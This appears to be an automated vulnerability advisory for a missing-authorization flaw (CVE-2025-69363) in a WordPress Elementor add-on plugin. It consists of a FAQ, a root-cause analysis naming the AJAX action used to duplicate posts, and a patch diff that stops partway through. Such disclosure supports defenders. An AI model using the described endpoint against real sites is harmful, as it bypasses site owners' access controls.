What is CVE-2025-69363?

CVE-2025-69363 is a medium severity vulnerability in the Responsive Addons for Elementor plugin for WordPress, affecting versions up to and including 2.0.8. It involves a missing authorization check that allows authenticated users with Contributor-level access or higher to perform unauthorized actions, specifically duplicating posts.

How does the vulnerability work?

The vulnerability arises from a lack of capability checks in the post duplication functionality of the plugin. Authenticated users can access specific AJAX endpoints to duplicate posts they should not have permission to modify, including published and password-protected content.

Who is affected by this vulnerability?

Any WordPress site using the Responsive Addons for Elementor plugin version 2.0.8 or earlier is affected. Users with Contributor-level access or higher can exploit this vulnerability to duplicate posts without proper authorization.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Responsive Addons for Elementor plugin installed on your WordPress site. If it is version 2.0.8 or earlier, your site is at risk and should be updated immediately.

How can I fix or mitigate this issue?

The vulnerability is fixed in version 2.0.9 of the Responsive Addons for Elementor plugin. Update the plugin to the latest version to mitigate the risk. Additionally, review user permissions and restrict access for Contributor-level users as a precaution.

What does the CVSS score of 4.3 mean?

The CVSS score of 4.3 indicates a medium severity vulnerability. This means that while it is not critical, it poses a significant risk that could lead to unauthorized actions on the site, especially if exploited by authenticated users.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability allows attackers to duplicate any post on the site, which can lead to unauthorized copies of sensitive content and disrupt content management. Although it does not directly escalate privileges, it undermines the intended permission model of WordPress.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an authenticated user with Contributor-level credentials can exploit the vulnerability to duplicate posts via the AJAX endpoint. It involves sending a crafted request to the WordPress admin-ajax.php with the action parameter set to duplicate a post.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider temporarily disabling the plugin or restricting access to Contributor-level users. Monitor user activities and review logs for any unauthorized actions until the plugin can be updated.

Are there any other security measures I should take?

In addition to updating the plugin, ensure that all WordPress components are regularly updated, implement strong user access controls, and consider using security plugins that monitor for unauthorized changes or access attempts.

Where can I find more information about CVE-2025-69363?

More information about CVE-2025-69363 can be found on the National Vulnerability Database (NVD) and other security advisory platforms. Additionally, the plugin’s changelog and support forums may provide updates and discussions related to this vulnerability.

How can I report any suspicious activity related to this vulnerability?

If you suspect that your site has been compromised due to this vulnerability, report the activity to your hosting provider and consider engaging a security professional. Document any suspicious actions and gather logs to assist in the investigation.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-69363: Responsive Addons for Elementor <= 2.0.8 – Missing Authorization (responsive-addons-for-elementor)

CVE ID CVE-2025-69363

Plugin responsive-addons-for-elementor

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 2.0.8

Patched Version 2.0.9

Disclosed January 11, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-69363:
The Responsive Addons for Elementor plugin for WordPress, versions up to and including 2.0.8, contains a missing authorization vulnerability. This flaw allows authenticated users with Contributor-level permissions or higher to duplicate posts without proper capability checks, violating the WordPress permission model.

Atomic Edge research identifies the root cause in the `class-rael-duplicator.php` file. The plugin’s post duplication functionality lacked authorization checks in multiple critical functions. The `rae_get_duplicate_link` function (line 83), `rae_register_bulk_action` function (line 100), `rae_handle_bulk_action` function (line 115), and `rae_duplicate_post_handler` function (line 184) all executed without verifying the user’s permissions to duplicate specific posts. This omission created a capability bypass vulnerability.

The exploitation method involves authenticated attackers with Contributor-level access or higher accessing the post duplication endpoints. Attackers can trigger the vulnerability through the AJAX handler at `/wp-admin/admin-ajax.php` with the action parameter set to `rael_duplicate_post`, or through bulk actions in the WordPress admin interface. The attacker supplies a target post ID parameter to duplicate posts they should not have permission to modify, including published posts and password-protected content.

The patch introduces a new private method `rae_user_can_duplicate_post` (lines 359-393) that performs comprehensive capability checks. This method verifies the post exists, checks if the user can edit the post via `current_user_can(‘edit_post’, $post_id)`, and adds specific restrictions for Contributor users. Contributors cannot duplicate non-published posts or password-protected posts. The patch integrates this check into all four vulnerable functions, returning empty strings, skipping unauthorized posts, or displaying error messages as appropriate.

Successful exploitation allows authenticated attackers to duplicate any post on the WordPress site, regardless of ownership or publication status. This violates the intended WordPress permission model where Contributors can only edit their own unpublished posts. Attackers can duplicate sensitive content, create unauthorized copies of restricted posts, and potentially disrupt site content management. The vulnerability does not directly enable privilege escalation but bypasses content-level access controls.

Differential between vulnerable and patched code

Code Diff

--- a/responsive-addons-for-elementor/ext/class-rael-duplicator.php
+++ b/responsive-addons-for-elementor/ext/class-rael-duplicator.php
@@ -83,6 +83,10 @@
 	 */
 	public function rae_get_duplicate_link( $post_id ) {

+		if ( ! $this->rae_user_can_duplicate_post( $post_id ) ) {
+			return '';
+		}
+
 		 $url = wp_nonce_url(
 			admin_url( 'admin.php?action=rael_duplicate_post&post=' . $post_id ),
 			'rael_duplicate_post_' . $post_id
@@ -100,6 +104,9 @@
 	 * Add bulk action
 	 */
 	public function rae_register_bulk_action( $bulk_actions ) {
+		if ( ! current_user_can( 'edit_posts' ) ) {
+			return $bulk_actions;
+		}
 		$bulk_actions['rael_duplicate'] = __( 'Duplicate', 'responsive-addons-for-elementor' );
 		return $bulk_actions;
 	}
@@ -115,6 +122,9 @@
 		}

 		foreach ( $post_ids as $post_id ) {
+			if ( ! $this->rae_user_can_duplicate_post( $post_id ) ) {
+				continue;
+			}
 			$this->rae_duplicate( $post_id );
 		}

@@ -184,6 +194,10 @@
 			wp_die( esc_html__( 'Invalid request.', 'responsive-addons-for-elementor' ) );
 		}

+		if ( ! $this->rae_user_can_duplicate_post( $post_id ) ) {
+			wp_die( esc_html__( 'You are not allowed to duplicate this post.', 'responsive-addons-for-elementor' ) );
+		}
+
 		$new_id = $this->rae_duplicate( $post_id );

 		if ( is_wp_error( $new_id ) ) {
@@ -345,6 +359,32 @@
 		' );
 	}

+	/* Added to Fix vulnerability */
+	private function rae_user_can_duplicate_post( $post_id ) {
+		$post = get_post( $post_id );
+		if ( ! $post ) {
+			return false;
+		}
+
+		if ( ! current_user_can( 'edit_post', $post_id ) ) {
+			return false;
+		}
+
+		if ( current_user_can( 'contributor' ) && ! current_user_can( 'edit_others_posts' ) ) {
+
+			if ( $post->post_status !== 'publish' ) {
+				return false;
+			}
+
+			if ( ! empty( $post->post_password ) ) {
+				return false;
+			}
+		}
+
+		return true;
+	}
+
+

 	}

--- a/responsive-addons-for-elementor/includes/widgets-manager/widgets/class-responsive-addons-for-elementor-image-gallery.php
+++ b/responsive-addons-for-elementor/includes/widgets-manager/widgets/class-responsive-addons-for-elementor-image-gallery.php
@@ -90,6 +90,8 @@
 		return array(
 			'swiper',
 			'e-swiper',
+			'elementor-icons',
+			'elementor-editor'
 		);
 	}
 	/**
@@ -1728,15 +1730,15 @@
 				'options'      => array(
 					'left'   => array(
 						'title' => __( 'Left', 'responsive-addons-for-elementor' ),
-						'icon'  => 'fa fa-align-left',
+						'icon'  => 'eicon-text-align-left',
 					),
 					'center' => array(
 						'title' => __( 'Center', 'responsive-addons-for-elementor' ),
-						'icon'  => 'fa fa-align-center',
+						'icon'  => 'eicon-text-align-center',
 					),
 					'right'  => array(
 						'title' => __( 'Right', 'responsive-addons-for-elementor' ),
-						'icon'  => 'fa fa-align-right',
+						'icon'  => 'eicon-text-align-right',
 					),
 				),
 				'default'      => 'center',
@@ -1882,6 +1884,17 @@
 				),
 			)
 		);
+		$this->add_responsive_control(
+			'rael_filterable_tab__border_radius',
+			array(
+				'label'      => esc_html__( 'Border Radius', 'responsive-addons-for-elementor' ),
+				'type'       => Controls_Manager::DIMENSIONS,
+				'size_units' => array( 'px', 'em', '%' ),
+				'selectors'  => array(
+					'{{WRAPPER}} .rael-masonry-filter' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+				),
+			)
+		);

 		$this->end_controls_tab();

@@ -1899,11 +1912,11 @@
 		$this->add_control(
 			'rael_cat_filter_hover_color',
 			array(
-				'label'     => __( 'Text Active / Hover Color', 'responsive-addons-for-elementor' ),
+				'label'     => __( 'Text Hover Color', 'responsive-addons-for-elementor' ),
 				'type'      => Controls_Manager::COLOR,
 				'default'   => '#ffffff',
 				'selectors' => array(
-					'{{WRAPPER}} .rael-gallery-parent .rael-masonry-filters .rael-masonry-filter:hover, {{WRAPPER}} .rael-gallery-parent .rael-masonry-filters .rael-current' => 'color: {{VALUE}};',
+					'{{WRAPPER}} .rael-gallery-parent .rael-masonry-filters .rael-masonry-filter:hover' => 'color: {{VALUE}};',
 				),
 				'condition' => array(
 					'rael_gallery_style'          => array( 'grid', 'masonry', 'justified' ),
@@ -1915,7 +1928,7 @@
 		$this->add_control(
 			'rael_cat_filter_bg_hover_color',
 			array(
-				'label'     => __( 'Background Active / Hover Color', 'responsive-addons-for-elementor' ),
+				'label'     => __( 'Background Hover Color', 'responsive-addons-for-elementor' ),
 				'type'      => Controls_Manager::COLOR,
 				'global'    => array(
 					'default' => Global_Colors::COLOR_ACCENT,
@@ -1929,22 +1942,97 @@
 				),
 			)
 		);
+		$this->add_group_control(
+			Group_Control_Border::get_type(),
+			array(
+				'name'      => 'cat_filter_border_hover',
+				'label'     => __( 'Border', 'responsive-addons-for-elementor' ),
+				'selector'  => '{{WRAPPER}} .rael-gallery-parent .rael-masonry-filters .rael-masonry-filter:hover, {{WRAPPER}} .rael-gallery-parent .rael-masonry-filters .rael-filters-dropdown-button',
+				'condition' => array(
+					'rael_gallery_style'          => array( 'grid', 'masonry', 'justified' ),
+					'rael_masonry_filters_enable' => 'yes',
+				),
+			)
+		);
+		$this->add_responsive_control(
+			'rael_filterable_tab__border_radius_hover',
+			array(
+				'label'      => esc_html__( 'Border Radius', 'responsive-addons-for-elementor' ),
+				'type'       => Controls_Manager::DIMENSIONS,
+				'size_units' => array( 'px', 'em', '%' ),
+				'selectors'  => array(
+					'{{WRAPPER}} .rael-masonry-filter:hover' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+				),
+			)
+		);
+
+		$this->end_controls_tab();
+
+		//Active Tab
+		$this->start_controls_tab(
+			'rael_cat_filters_active',
+			array(
+				'label'     => __( 'Active', 'responsive-addons-for-elementor' ),
+				'condition' => array(
+					'rael_gallery_style'          => array( 'grid', 'masonry', 'justified' ),
+					'rael_masonry_filters_enable' => 'yes',
+				),
+			)
+		);
+
+		$this->add_control(
+			'rael_cat_filter_active_color',
+			array(
+				'label'     => __( 'Text Active Color', 'responsive-addons-for-elementor' ),
+				'type'      => Controls_Manager::COLOR,
+				'default'   => '#ffffff',
+				'selectors' => array(
+					'{{WRAPPER}} .rael-gallery-parent .rael-masonry-filters .rael-current' => 'color: {{VALUE}};',
+				),
+				'condition' => array(
+					'rael_gallery_style'          => array( 'grid', 'masonry', 'justified' ),
+					'rael_masonry_filters_enable' => 'yes',
+				),
+			)
+		);

 		$this->add_control(
-			'rael_cat_filter_border_hover_color',
+			'rael_cat_filter_bg_active_color',
 			array(
-				'label'     => __( 'Border Hover Color', 'responsive-addons-for-elementor' ),
+				'label'     => __( 'Background Active Color', 'responsive-addons-for-elementor' ),
 				'type'      => Controls_Manager::COLOR,
 				'global'    => array(
 					'default' => Global_Colors::COLOR_ACCENT,
 				),
 				'selectors' => array(
-					'{{WRAPPER}} .rael-gallery-parent .rael-masonry-filters .rael-masonry-filter:hover, {{WRAPPER}} .rael-gallery-parent .rael-masonry-filters .rael-current' => 'border-color: {{VALUE}};',
+					'{{WRAPPER}} .rael-gallery-parent .rael-masonry-filters .rael-current' => 'background-color: {{VALUE}};',
+				),
+				'condition' => array(
+					'rael_gallery_style'          => array( 'grid', 'masonry', 'justified' ),
+					'rael_masonry_filters_enable' => 'yes',
 				),
+			)
+		);
+		$this->add_group_control(
+			Group_Control_Border::get_type(),
+			array(
+				'name'      => 'cat_filter_border_active',
+				'label'     => __( 'Border', 'responsive-addons-for-elementor' ),
+				'selector'  => '{{WRAPPER}} .rael-gallery-parent .rael-masonry-filters .rael-masonry-filter.rael-current, {{WRAPPER}} .rael-gallery-parent .rael-masonry-filters .rael-filters-dropdown-button',
 				'condition' => array(
-					'rael_gallery_style'             => array( 'grid', 'masonry', 'justified' ),
-					'rael_masonry_filters_enable'    => 'yes',
-					'rael_cat_filter_border_border!' => '',
+					'rael_gallery_style'          => array( 'grid', 'masonry', 'justified' ),
+					'rael_masonry_filters_enable' => 'yes',
+				),
+			)
+		);
+		$this->add_responsive_control(
+			'rael_filterable_tab__border_radius_active',
+			array(
+				'label'      => esc_html__( 'Border Radius', 'responsive-addons-for-elementor' ),
+				'type'       => Controls_Manager::DIMENSIONS,
+				'size_units' => array( 'px', 'em', '%' ),
+				'selectors'  => array(
+					'{{WRAPPER}} .rael-masonry-filter.rael-current' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
 				),
 			)
 		);
--- a/responsive-addons-for-elementor/includes/widgets-manager/widgets/class-responsive-addons-for-elementor-search-form.php
+++ b/responsive-addons-for-elementor/includes/widgets-manager/widgets/class-responsive-addons-for-elementor-search-form.php
@@ -111,6 +111,21 @@
 				'frontend_available' => true,
 			)
 		);
+		$this->add_control(
+		'rael_minimal_show_icon',
+			array(
+				'label'        => __( 'Show Icon', 'responsive-addons-for-elementor' ),
+				'type'         => Controls_Manager::SWITCHER,
+				'label_on'     => __( 'Show', 'responsive-addons-for-elementor' ),
+				'label_off'    => __( 'Hide', 'responsive-addons-for-elementor' ),
+				'return_value' => 'yes',
+				'default'      => 'yes',
+				'condition' => array(
+					'rael_skin' => 'minimal',
+				),
+			)
+		);
+

 		$this->add_control(
 			'rael_placeholder',
@@ -143,6 +158,7 @@
 				'options'      => array(
 					'icon' => __( 'Icon', 'responsive-addons-for-elementor' ),
 					'text' => __( 'Text', 'responsive-addons-for-elementor' ),
+					'both' => __( 'Both', 'responsive-addons-for-elementor' ),
 				),
 				'prefix_class' => 'rael-elementor-search-form--button-type-',
 				'render_type'  => 'template',
@@ -160,7 +176,7 @@
 				'default'   => __( 'Search', 'responsive-addons-for-elementor' ),
 				'separator' => 'after',
 				'condition' => array(
-					'rael_button_type' => 'text',
+					'rael_button_type' => array( 'text','both' ),
 					'rael_skin'        => 'classic',
 				),
 			)
@@ -169,26 +185,18 @@
 		$this->add_control(
 			'rael_icon',
 			array(
-				'label'        => __( 'Icon', 'responsive-addons-for-elementor' ),
-				'type'         => Controls_Manager::CHOOSE,
-				'default'      => 'search',
-				'options'      => array(
-					'search' => array(
-						'title' => __( 'Search', 'responsive-addons-for-elementor' ),
-						'icon'  => 'eicon-search',
-					),
-					'arrow'  => array(
-						'title' => __( 'Arrow', 'responsive-addons-for-elementor' ),
-						'icon'  => 'eicon-arrow-right',
-					),
+				'label'            => esc_html__( 'Icon', 'responsive-addons-for-elementor' ),
+				'type'             => Controls_Manager::ICONS,
+				'default' => array(
+					'value'   => 'fas fa-search',
+					'library' => 'fa-solid',
 				),
-				'render_type'  => 'template',
-				'prefix_class' => 'rael-elementor-search-form--icon-',
 				'condition'    => array(
-					'rael_button_type' => 'icon',
+					'rael_button_type' => array( 'icon','both' ),
 					'rael_skin'        => 'classic',
 				),
 			)
+
 		);

 		$this->add_control(
@@ -201,7 +209,7 @@
 				),
 				'selectors' => array(
 					'{{WRAPPER}} .rael-elementor-search-form__container' => 'min-height: {{SIZE}}{{UNIT}}',
-					'{{WRAPPER}} .rael-elementor-search-form__submit' => 'min-width: {{SIZE}}{{UNIT}}',
+					'{{WRAPPER}} .rael-elementor-search-form__submit.txt_icon' => 'min-width: {{SIZE}}{{UNIT}}',
 					'body:not(.rtl) {{WRAPPER}} .rael-elementor-search-form__icon' => 'padding-left: calc({{SIZE}}{{UNIT}} / 3)',
 					'body.rtl {{WRAPPER}} .rael-elementor-search-form__icon' => 'padding-right: calc({{SIZE}}{{UNIT}} / 3)',
 					'{{WRAPPER}} .rael-elementor-search-form__input, {{WRAPPER}}.rael-elementor-search-form--button-type-text .rael-elementor-search-form__submit' => 'padding-left: calc({{SIZE}}{{UNIT}} / 3); padding-right: calc({{SIZE}}{{UNIT}} / 3)',
@@ -225,6 +233,21 @@
 		);

 		$this->add_control(
+			'rael_toggle_icon',
+			array(
+				'label'            => esc_html__( 'Icon', 'responsive-addons-for-elementor' ),
+				'type'             => Controls_Manager::ICONS,
+				'condition'    => array(
+					'rael_skin' => 'full_screen',
+				),
+				'default' => array(
+					'value'   => 'fas fa-search',
+					'library' => 'fa-solid',
+				),
+			)
+
+		);
+		$this->add_control(
 			'rael_toggle_align',
 			array(
 				'label'     => __( 'Alignment', 'responsive-addons-for-elementor' ),
@@ -263,6 +286,7 @@
 				),
 				'selectors' => array(
 					'{{WRAPPER}} .rael-elementor-search-form__toggle i' => 'font-size: {{SIZE}}{{UNIT}}; width: {{SIZE}}{{UNIT}}; height: {{SIZE}}{{UNIT}}',
+					'{{WRAPPER}} .rael-elementor-search-form__toggle svg' => 'font-size: {{SIZE}}{{UNIT}}; width: {{SIZE}}{{UNIT}}; height: {{SIZE}}{{UNIT}};padding:6px',
 				),
 				'condition' => array(
 					'rael_skin' => 'full_screen',
@@ -293,9 +317,11 @@
 				),
 				'selectors' => array(
 					'{{WRAPPER}} .rael-elementor-search-form__icon' => 'font-size: {{SIZE}}{{UNIT}}',
+					'{{WRAPPER}} .rael-elementor-search-form__submit.txt_icon' => 'font-size: {{SIZE}}{{UNIT}}',
 				),
 				'condition' => array(
 					'rael_skin' => 'minimal',
+					'rael_minimal_show_icon' => 'yes',
 				),
 				'separator' => 'before',
 			)
@@ -664,7 +690,7 @@
 				'label'     => __( 'Color', 'responsive-addons-for-elementor' ),
 				'type'      => Controls_Manager::COLOR,
 				'selectors' => array(
-					'{{WRAPPER}} .rael-elementor-search-form__toggle' => 'color: {{VALUE}}; border-color: {{VALUE}}',
+					'{{WRAPPER}} .rael-elementor-search-form__toggle svg path' => 'fill: {{VALUE}}; border-color: {{VALUE}}',
 				),
 			)
 		);
@@ -675,7 +701,7 @@
 				'label'     => __( 'Background Color', 'responsive-addons-for-elementor' ),
 				'type'      => Controls_Manager::COLOR,
 				'selectors' => array(
-					'{{WRAPPER}} .rael-elementor-search-form__toggle i' => 'background-color: {{VALUE}}',
+					'{{WRAPPER}} .rael-elementor-search-form__toggle svg' => 'background-color: {{VALUE}};padding: 6px;',
 				),
 			)
 		);
@@ -779,32 +805,6 @@
 			)
 		);

-		// Set the selected icon.
-		$icon_class = '';
-		if ( 'icon' === $settings['rael_button_type'] ) {
-			$icon_class = 'search';
-
-			if ( 'arrow' === $settings['rael_icon'] ) {
-				$icon_class = is_rtl() ? 'arrow-left' : 'arrow-right';
-			}
-
-			$this->add_render_attribute(
-				'icon',
-				array(
-					'class' => 'fa fa-' . $icon_class,
-				)
-			);
-		} elseif ( 'text' === $settings['rael_button_type'] && 'full_screen' === $settings['rael_skin'] ) {
-			$icon_class = 'search';
-
-			$this->add_render_attribute(
-				'icon',
-				array(
-					'class' => 'fa fa-' . $icon_class,
-				)
-			);
-		}
-

 		$migration_allowed = Icons_Manager::is_migration_allowed();
 		$icon              = array(
@@ -816,31 +816,52 @@
 			<?php do_action( 'rael_search_form_before_input', $this ); ?>
 			<?php if ( 'full_screen' === $settings['rael_skin'] ) : ?>
 				<div class="rael-elementor-search-form__toggle">
-					<?php if ( ! $migration_allowed || ! Icons_Manager::render_icon( $settings['rael_icon'], array( 'aria-hidden' => 'true' ) ) ) { ?>
-						<i class="fa fas fa-search" aria-hidden="true"></i>
-					<?php } ?>
+						<?php
+						if(!empty($settings['rael_toggle_icon'])){
+							Icons_Manager::render_icon( $settings['rael_toggle_icon'] );
+						} ?>
+
 					<span class="elementor-screen-only"><?php esc_html_e( 'Search', 'responsive-addons-for-elementor' ); ?></span>
 				</div>
 			<?php endif; ?>
 			<div class="rael-elementor-search-form__container">
 				<?php if ( 'minimal' === $settings['rael_skin'] ) : ?>
 					<div class="rael-elementor-search-form__icon">
+						<?php  if( $settings['rael_minimal_show_icon'] == 'yes' ){ ?>
 						<i class="fa fa-search" aria-hidden="true"></i>
+						<?php } ?>
 						<span class="elementor-screen-only"><?php esc_html_e( 'Search', 'responsive-addons-for-elementor' ); ?></span>
 					</div>
 				<?php endif; ?>
 				<input <?php echo wp_kses_post( $this->get_render_attribute_string( 'input' ) ); ?>>
 				<?php do_action( 'rael_search_form_after_input', $this ); ?>
-				<?php if ( 'classic' === $settings['rael_skin'] ) : ?>
-					<button class="rael-elementor-search-form__submit" type="submit" title="<?php esc_attr_e( 'Search', 'responsive-addons-for-elementor' ); ?>" aria-label="<?php esc_attr_e( 'Search', 'responsive-addons-for-elementor' ); ?>">
-						<?php if ( 'icon' === $settings['rael_button_type'] ) : ?>
-							<i <?php echo wp_kses_post( $this->get_render_attribute_string( 'icon' ) ); ?> aria-hidden="true"></i>
-							<span class="elementor-screen-only"><?php esc_html_e( 'Search', 'responsive-addons-for-elementor' ); ?></span>
-						<?php elseif ( ! empty( $settings['rael_button_text'] ) ) : ?>
-							<?php echo wp_kses_post( $settings['rael_button_text'] ); ?>
-						<?php endif; ?>
+				<?php if ( 'classic' === $settings['rael_skin'] ) :
+				if ( in_array( $settings['rael_button_type'], [ 'text', 'icon' ], true )){
+					$btnclass = 'txt_icon';
+				}
+				else{
+					$btnclass = 'both_cls';
+				}
+					?>
+					<button class="rael-elementor-search-form__submit <?php echo $btnclass; ?>" type="submit" title="<?php esc_attr_e( 'Search', 'responsive-addons-for-elementor' ); ?>" aria-label="<?php esc_attr_e( 'Search', 'responsive-addons-for-elementor' ); ?>">
+						<?php
+					// TEXT should show if button_type is "text" OR "both"
+					if ( in_array( $settings['rael_button_type'], [ 'text', 'both' ], true ) && ! empty( $settings['rael_button_text'] ) ) : ?>
+						<span class="rael-button-text"><?php echo wp_kses_post( $settings['rael_button_text'] ); ?></span>
+					<?php endif; ?>
+					<?php endif; ?>
+					<?php // ICON should show if button_type is "icon" OR "both"
+					if ( 'classic' === $settings['rael_skin'] && in_array( $settings['rael_button_type'], [ 'icon', 'both' ], true ) ) : ?>
+						<?php if(!empty($settings['rael_icon'])){
+							Icons_Manager::render_icon( $settings['rael_icon'] );
+							} ?>
+						<span class="elementor-screen-only"><?php esc_html_e( 'Search', 'responsive-addons-for-elementor' ); ?></span>
 					</button>
-				<?php endif; ?>
+
+					<?php endif; ?>
+
+
+
 				<?php if ( 'full_screen' === $settings['rael_skin'] ) : ?>
 					<div class="dialog-lightbox-close-button dialog-close-button">
 						<i class="eicon-close" aria-hidden="true"></i>
@@ -860,53 +881,7 @@
 	 * @since 1.2.0
 	 * @access protected
 	 */
-	protected function content_template() {
-		?>
-		<#
-		var iconClass = 'fa fas fa-search';

-		if ( 'arrow' == settings.rael_icon ) {
-			if ( elementorCommon.config.isRTL ) {
-				iconClass = 'fa fas fa-arrow-left';
-			} else {
-				iconClass = 'fa fas fa-arrow-right';
-			}
-		}
-		#>
-		<form class="rael-elementor-search-form" action="" role="search">
-			<# if ( 'full_screen' == settings.rael_skin ) { #>
-			<div class="rael-elementor-search-form__toggle">
-				<i class="fa fas fa-search" aria-hidden="true"></i>
-				<span class="elementor-screen-only"><?php esc_html_e( 'Search', 'responsive-addons-for-elementor' ); ?></span>
-			</div>
-			<# } #>
-			<div class="rael-elementor-search-form__container">
-				<# if ( 'minimal' == settings.rael_skin ) { #>
-				<div class="rael-elementor-search-form__icon">
-					<i class="fa fas fa-search" aria-hidden="true"></i>
-					<span class="elementor-screen-only"><?php esc_html_e( 'Search', 'responsive-addons-for-elementor' ); ?></span>
-				</div>
-				<# } #>
-				<input type="search"
-						name="s"
-						title="<?php esc_attr_e( 'Search', 'responsive-addons-for-elementor' ); ?>"
-						class="rael-elementor-search-form__input"
-						placeholder="{{ settings.rael_placeholder }}">
-
-				<# if ( 'classic' == settings.rael_skin ) { #>
-				<button class="rael-elementor-search-form__submit" type="submit">
-					<# if ( 'icon' == settings.rael_button_type ) { #>
-					<i class="{{ iconClass }}" aria-hidden="true"></i>
-					<span class="elementor-screen-only"><?php esc_html_e( 'Submit', 'responsive-addons-for-elementor' ); ?></span>
-					<# } else if ( settings.rael_button_text ) { #>
-					{{{ settings.rael_button_text }}}
-					<# } #>
-				</button>
-				<# } #>
-			</div>
-		</form>
-		<?php
-	}

 	/**
 	 * Get Custom help URL
--- a/responsive-addons-for-elementor/includes/widgets-manager/widgets/class-responsive-addons-for-elementor-testimonial-slider.php
+++ b/responsive-addons-for-elementor/includes/widgets-manager/widgets/class-responsive-addons-for-elementor-testimonial-slider.php
@@ -155,6 +155,23 @@
 				'type'  => Controls_Manager::TEXTAREA,
 			)
 		);
+
+
+		$repeater->add_control(
+			'testimonial_rating',
+			array(
+				'label'   => __( 'Testimonial Rating', 'responsive-addons-for-elementor' ),
+				'type'    => Controls_Manager::SELECT,
+				'default' => '5',
+				'options' => array(
+					'1' => '1',
+					'2' => '2',
+					'3' => '3',
+					'4' => '4',
+					'5' => '5',
+				),
+			)
+		);

 		$repeater->add_control(
 			'image',
@@ -194,6 +211,17 @@
 				'separator' => 'after',
 			)
 		);
+		$this->add_control(
+			'enable_rating',
+			array(
+				'label'        => __( 'Enable Rating', 'responsive-addons-for-elementor' ),
+				'type'         => Controls_Manager::SWITCHER,
+				'label_on'     => __( 'Yes', 'responsive-addons-for-elementor' ),
+				'label_off'    => __( 'No', 'responsive-addons-for-elementor' ),
+				'return_value' => 'yes',
+				'default'      => 'yes',
+			)
+		);

 		$this->add_responsive_control(
 			'rael_icon_size',
@@ -345,7 +373,7 @@
 				'render_type'        => 'template',
 				'frontend_available' => true,
 			)
-		);
+		);

 		$this->add_control(
 			'pagination',
@@ -660,7 +688,21 @@
 				'tab'   => Controls_Manager::TAB_STYLE,
 			)
 		);
-
+		$this->add_control(
+			'testimonial_content_background_color',
+			array(
+				'label'     => __( 'Background Color', 'responsive-addons-for-elementor' ),
+				'type'      => Controls_Manager::COLOR,
+				'alpha'     => false,
+				'default' => '#e6e9ec',
+				'selectors' => array(
+					'{{WRAPPER}} .responsive-testimonial__content, {{WRAPPER}} .responsive-testimonial__content:after' => 'background-color: {{VALUE}}',
+				),
+				'condition' => array(
+					'skin' => 'bubble',
+				),
+			)
+		);
 		$this->add_responsive_control(
 			'content_gap',
 			array(
@@ -848,6 +890,16 @@
 				),
 			)
 		);
+		$this->add_responsive_control(
+			'image_margin',
+			array(
+				'label' => __( 'Margin', 'responsive-addons-for-elementor' ),
+				'type'  => Controls_Manager::DIMENSIONS,
+				'selectors' => array(
+					'{{WRAPPER}} .responsive-testimonial__image' => 'margin: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+				),
+			)
+		);

 		$this->add_control(
 			'image_border',
@@ -963,9 +1015,94 @@

 		$this->end_controls_tab();
 		$this->end_controls_tabs();
+
+
+		$this->end_controls_section();
+		$this->start_controls_section(
+			'section_rating_style',
+			[
+				'label' => __( 'Rating', 'responsive-addons-for-elementor' ),
+				'tab'   => Controls_Manager::TAB_STYLE,
+			]
+		);
+
+		$this->add_control(
+			'rating_color',
+			[
+				'label' => __( 'Color', 'responsive-addons-for-elementor' ),
+				'type'  => Controls_Manager::COLOR,
+				'default' => '#ffb400',
+				'selectors' => [
+					'{{WRAPPER}} .rael-rating-stars i' => 'color: {{VALUE}};',
+
+				],
+			]
+		);
+
+		$this->add_responsive_control(
+			'rating_icon_size',
+			[
+				'label' => __( 'Icon Size', 'responsive-addons-for-elementor' ),
+				'type' => Controls_Manager::SLIDER,
+				'range' => [
+					'px' => [
+						'min' => 8,
+						'max' => 60,
+					],
+				],
+				'default' => array('size' => '17', 'unit' => 'px' ),
+				'selectors' => [
+					'{{WRAPPER}} .rael-rating-stars i' => 'font-size: {{SIZE}}{{UNIT}};',
+				],
+			]
+		);
+
+		$this->add_responsive_control(
+			'rating_item_margin_right',
+			[
+				'label' => __( 'Items Margin Right', 'responsive-addons-for-elementor' ),
+				'type'  => Controls_Manager::SLIDER,
+				'range' => [
+					'px' => [
+						'min' => 0,
+						'max' => 40,
+					],
+				],
+				'selectors' => [
+					'{{WRAPPER}} .rael-rating-stars i' => 'margin-right: {{SIZE}}{{UNIT}};',
+				],
+				'default' => [
+					'size' => 5,
+					'unit' => 'px',
+				],
+			]
+		);
+
+		$this->add_responsive_control(
+			'review_padding',
+			[
+				'label' => __( 'Review Padding', 'responsive-addons-for-elementor' ),
+				'type'  => Controls_Manager::DIMENSIONS,
+				'selectors' => [
+					'{{WRAPPER}} .rael-rating-stars' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+				],
+			]
+		);
+
+		$this->add_responsive_control(
+			'review_margin',
+			[
+				'label' => __( 'Review Margin', 'responsive-addons-for-elementor' ),
+				'type'  => Controls_Manager::DIMENSIONS,
+				'selectors' => [
+					'{{WRAPPER}} .rael-rating-stars' => 'margin: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+				],
+			]
+		);

 		$this->end_controls_section();

+
 		$this->start_controls_section(
 			'section_navigation',
 			array(
@@ -1106,21 +1243,54 @@
 				),
 			)
 		);
-
 		$this->add_control(
+			'pagination_style',
+			array(
+				'label'       => __( 'Choose Dots Style', 'responsive-addons-for-elementor' ),
+				'type'        => Controls_Manager::SELECT,
+				'label_block' => true,
+				'default'     => 'solid_circle',
+				'options'     => array(
+					'solid_circle'    => __( 'Solid Circle', 'responsive-addons-for-elementor' ),
+					'outline_circle'  => __( 'Outlined Circle', 'responsive-addons-for-elementor' ),
